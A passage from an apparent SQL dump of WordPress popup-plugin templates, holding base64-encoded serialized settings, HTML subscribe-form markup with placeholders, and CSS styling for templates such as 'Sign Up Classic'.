leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjI6IkdvIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjQwOiJOZXcgU3Vic2NyaWJlciBvbiBNeSBXb3JkUHJlc3MgVGVzdCBTaXRlIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIGlzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6MTI6InN0YXRfZ2FfY29kZSI7czowOiIiO3M6NToidHh0XzAiO3M6MTczOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmUuPC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNCI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<link href=\"https://fonts.googleapis.com/css?family=Montserrat\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupListsInner\">\r\n		<div class=\"ppsPopupTblCols\">\r\n          	[if bg_type_2 == \'img\']\r\n			<div class=\"ppsPopupLeftCol\">\r\n				<img src=\"[bg_img_2]\" class=\"ppsLogo\" />\r\n			</div>\r\n          	[endif]\r\n			<div class=\"ppsPopupRightCol\">\r\n				<div class=\"ppsBigArrow\"></div>\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupTxt_0\">[txt_0]</div>\r\n				[endif]\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: \"Montserrat\",Helvetica,Arial,sans-serif;\r\n  	font-size: 14px;\r\n  	[if bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[elseif bg_type_0 == \'color\']\r\n  	background: [bg_color_0];\r\nbackground: -moz-linear-gradient(left, [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 80) }} 31%, rgba(201,3,49,1) 56%, rgba(201,3,49,1) 67%);\r\nbackground: -webkit-gradient(left top, right top, color-stop(0%, [bg_color_0]), color-stop(31%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 80) }}), color-stop(56%, rgba(201,3,49,1)), color-stop(67%, rgba(201,3,49,1)));\r\nbackground: -webkit-linear-gradient(left, [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 80) }} 31%, rgba(201,3,49,1) 56%, rgba(201,3,49,1) 67%);\r\nbackground: -o-linear-gradient(left, [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 80) }} 31%, rgba(201,3,49,1) 56%, rgba(201,3,49,1) 67%);\r\nbackground: -ms-linear-gradient(left, [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 80) }} 31%, rgba(201,3,49,1) 56%, rgba(201,3,49,1) 67%);\r\nbackground: linear-gradient(to right, [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 80) }} 31%, rgba(201,3,49,1) 56%, rgba(201,3,49,1) 67%);\r\nfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'[bg_color_0]\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 80) }}\', GradientType=1 );\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #fff;\r\n    font-size: 31px;\r\n	line-height: 1.2;\r\n	text-align: center;\r\n  	margin-bottom: 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupListsInner {\r\n  	[if bg_type_0 == \'color\']\r\n    background: {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}; /* Old browsers */\r\n    background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* FF3.6+ */\r\n    background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%,[bg_color_0])); /* Chrome,Safari4+ */\r\n    background: -webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Chrome10+,Safari5.1+ */\r\n    background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Opera 12+ */\r\n    background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* IE10+ */\r\n    background: radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* W3C */\r\n    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'#eaeaea\',GradientType=1 ); /* IE6-9 fallback on horizontal gradient */\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 .ppsTxtContent {\r\n	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	font-size: 12px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTblCols {\r\n	display: table;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLeftCol {\r\n	display: table-cell;\r\n    padding: 0;\r\n  	[if enb_subscribe]\r\n  	width: 40%;\r\n  	[else]\r\n  	width: 30%;\r\n  	min-height: 60%;\r\n  	[endif]\r\n  	vertical-align: top;\r\n}\r\n#ppsPopupShell_[ID] .ppsLogo {\r\n  	width: auto;\r\n  	height: auto;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupRightCol {\r\n    color: #fff;\r\n  	width: 60%;\r\n	display: table-cell;\r\n  	padding: 50px 40px 20px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 50px 0;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 35px;\r\n  	border-radius: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	background: [bg_color_1];\r\n  	border: 1px solid transparent;\r\n  	color: #000;\r\n  	padding-left: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n  	margin-left: -15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding: 20px 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border: 1px solid #fff;\r\n  	[if bg_type_3 == \'color\']\r\n  	background: [bg_color_3];\r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n    font-size: 20px;\r\n  	cursor: pointer;\r\n  	border-radius: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	right: -20px !important;\r\n	top: -10px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n  	[if enb_subscribe]\r\n    color: #979696;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n  	margin-left: 10px;\r\n  	[else]\r\n  	margin-top: 10px;\r\n  	color: #979696;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n    margin-left: 10px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	[if enb_subscribe]\r\n  	[else]\r\n  	margin-top: 130px;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] li{\r\n	font-weight: bold;\r\n  	font-size: 13px;\r\n  	padding-top: 3px;\r\n	padding-bottom: 3px;\r\n  	color: #737E86;\r\n}','girl-2.jpg',1,1,1,1,0,0,0,'2015-01-13 18:22:48',1,0),(42,'Sign Up Classic',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjE0OiJzaG93X2RhdGVfZnJvbSI7czowOiIiO3M6MTI6InNob3dfZGF0ZV90byI7czowOiIiO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoxNToiY291bnRfdGltZXNfbnVtIjtzOjE6IjEiO3M6MTU6ImNvdW50X3RpbWVzX21lcyI7czozOiJkYXkiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9zZWFyY2hfZW5naW5lc19zaG93IjtzOjE6IjAiO3M6MTg6ImhpZGVfcHJlZ191cmxfc2hvdyI7czoxOiIwIjtzOjEzOiJoaWRlX3ByZWdfdXJsIjtzOjA6IiI7czoyNDoiaGlkZV9mb3JfdXNlcl9yb2xlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo1NTp7czo1OiJ3aWR0aCI7czozOiI0MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMCI7czo0OToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvc2lnbi11cC1jbGFzc2ljLWJnLnBuZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjYzlhZTk0IjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzljODU3MCI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiNmZmZmZmYiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiI2Y5ZTZjZSI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzU4NTg1OCI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czoxMToid2hpbGVfY2xvc2UiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjA6IiI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czozMToiU2lnbiBVcDxiciAvPlRvIE91ciBOZXdzbGV0dGVyISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6NDoiYm94eSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo3OiJTSUdOIFVQIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjQwOiJOZXcgU3Vic2NyaWJlciBvbiBNeSBXb3JkUHJlc3MgVGVzdCBTaXRlIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6MTI6InN0YXRfZ2FfY29kZSI7czowOiIiO3M6NToidHh0XzAiO3M6MTcyOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmU8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIyIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link href=\"https://fonts.googleapis.com/css?family=Dancing+Script|Gloria+Hallelujah|Hind|Pacifico|Satisfy\" rel=\"stylesheet\"> \r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \"Hind\",\"arial\",arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #4d4d4d;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  	width: 100%;\r\n  	display: table-cell;\r\n  	padding: 40px;\r\n	[if bg_type_0 == \'color\']\r\n	background-color: [bg_color_0];\r\n  	background-image: none;\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-family: \"Dancing Script\", arial;\r\n	font-size: 40px;\r\n	line-height: 40px;\r\n	font-weight: bold;\r\n  	margin-bottom: 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	margin-bottom: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n	border-radius: 0;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	padding-left: 10px;\r\n  	\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -4px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n  	background-image: none;\r\n  	border: 1px solid #fff;\r\n  	box-shadow: 0 0 0 4px [bg_color_1];\r\n  	width: calc(100% - 8px);\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   border-width: 2px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	width: 100%;\r\n	font-size: 14px;\r\n  	margin-bottom: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n  	right: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm {\r\n	margin-top:20px;\r\n}','sign-up-classic.jpg',1,1,1,1,0,0,0,'2015-01-10 17:59:43',1,0),(43,'Smart New Edition',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMzoib3ZlcmxheV9jbGljayI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5O